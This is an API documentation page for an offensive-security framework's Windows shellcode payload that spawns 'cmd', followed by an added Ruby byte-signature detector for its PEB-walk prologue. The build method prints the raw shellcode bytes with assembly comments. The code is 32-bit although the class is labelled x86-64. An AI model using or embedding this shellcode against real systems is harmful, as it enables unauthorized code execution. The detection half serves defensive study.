Class: Ronin::Payloads::Shellcode::Windows::X86_64::CMD

Inherits:
ExecShellPayload
Defined in:
lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb

Overview

Windows x86-64 shellcode that executes "cmd".

Instance Attribute Summary

Attributes inherited from Payload

#encoders, #payload

Instance Method Summary

Methods inherited from Ronin::Payloads::ShellcodePayload

payload_type, #shellcode

Methods inherited from ASMPayload

#assemble, assembler, payload_type

Methods included from Metadata::OS

included, #os, #os_version

Methods included from Metadata::Arch

#arch, included

Methods inherited from BinaryPayload

payload_type

Methods inherited from Payload

#built?, #built_payload, #bytesize, #cleanup, #encode_payload, #encoded_payload, encoder_class, #initialize, #length, payload_type, #perform_build, #perform_cleanup, #perform_postlaunch, #perform_prelaunch, #perform_validate, #postlaunch, #prelaunch, #rebuild_payload, #reencode_payload, register, #to_s, #validate

Constructor Details

This class inherits a constructor from Ronin::Payloads::Payload

Instance Method Details

#build ⇒ Object

Builds the shellcode.

# File 'lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb', line 55

def build
  @payload = "\x31\xC9" +                 # xor ecx,ecx
             "\x64\x8B\x71\x30" +         # mov esi,[fs:ecx+0x30]
             "\x8B\x76\x0C" +             # mov esi,[esi+0xc]
             "\x8B\x76\x1C" +             # mov esi,[esi+0x1c]
             "\x8B\x36" +                 # mov esi,[esi]
             "\x8B\x06" +                 # mov eax,[esi]
             "\x8B\x68\x08" +             # mov ebp,[eax+0x8]
             "\xEB\x20" +                 # jmp short 0x35
             "\x5B" +                     # pop ebx
             "\x53" +                     # push ebx
             "\x55" +                     # push ebp
             "\x5B" +                     # pop ebx
             "\x81\xEB\x11\x11\x11\x11" + # sub ebx,0x11111111
             "\x81\xC3\xDA\x3F\x1A\x11" + # add ebx,0x111a3fda (on Windows 7 x86: add ebx,0x1119f7a6)
             "\xFF\xD3" +                 # call ebx
             "\x81\xC3\x11\x11\x11\x11" + # add ebx,0x11111111
             "\x81\xEB\x8C\xCC\x18\x11" + # sub ebx,0x1118cc8c (on Windows 7 x86: sub ebx,0x1114ccd7)
             "\xFF\xD3" +                 # call ebx
             "\xE8\xDB\xFF\xFF\xFF" +     # call dword 0x15
             "\x63\x6d\x64"               # db "cmd"
end
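The first seven instructions of the listing above (the `fs:[0x30]` PEB walk down to a module base) are a fixed byte sequence that a defender can match on. The following Ruby is an added example, not code from ronin-payloads: it scans an arbitrary byte buffer for that prologue and reports where it occurs, and optionally checks that the literal "cmd" the payload appends follows it. The constant and method names (`PEB_WALK_PROLOGUE`, `find_peb_walk`, `cmd_shellcode?`) and the sample buffers are this example's own; the signature bytes are copied from the build above.

```ruby
# Added example (not part of ronin-payloads): byte-signature scan for the
# PEB-walk prologue that opens the shellcode listed above. The constant and
# method names here are this example's own.

# First 19 bytes of the build above:
#   xor ecx,ecx ; mov esi,[fs:ecx+0x30] ; mov esi,[esi+0xc] ;
#   mov esi,[esi+0x1c] ; mov esi,[esi] ; mov eax,[esi] ; mov ebp,[eax+0x8]
PEB_WALK_PROLOGUE = "\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C" \
                    "\x8B\x36\x8B\x06\x8B\x68\x08".b

# Returns every byte offset at which the prologue occurs in +buffer+.
# Overlapping matches are reported too (search resumes one byte later).
def find_peb_walk(buffer)
  data    = buffer.b          # compare raw bytes regardless of source encoding
  offsets = []
  pos     = 0
  while (idx = data.index(PEB_WALK_PROLOGUE, pos))
    offsets << idx
    pos = idx + 1
  end
  offsets
end

# Returns true when the buffer contains the prologue and, somewhere after it,
# the literal "cmd" that the build above appends as its final bytes.
def cmd_shellcode?(buffer)
  data = buffer.b
  find_peb_walk(data).any? { |off| data.index("cmd".b, off) }
end

# Constructed samples: a NOP sled, the prologue, a few more bytes taken from
# the listing, and the trailing "cmd"; and a benign buffer that merely
# mentions "cmd" as text.
SAMPLE_HIT  = ("\x90" * 8).b + PEB_WALK_PROLOGUE + "\xEB\x20\x5B\x53".b + "cmd".b
SAMPLE_MISS = "plain text with cmd but no shellcode".b

if $PROGRAM_NAME == __FILE__
  puts find_peb_walk(SAMPLE_HIT).inspect   # [8]
  puts cmd_shellcode?(SAMPLE_HIT)          # true
  puts cmd_shellcode?(SAMPLE_MISS)         # false
end
```

Because `find_peb_walk` works on `.b` (binary) copies, it can be pointed at file contents read with `File.binread` or at decoded network data without worrying about encoding errors; the 19-byte prologue is long enough that accidental matches in ordinary data are unlikely, but any signature this specific is trivially defeated by an encoder, so it is best treated as one indicator among several rather than a complete detection.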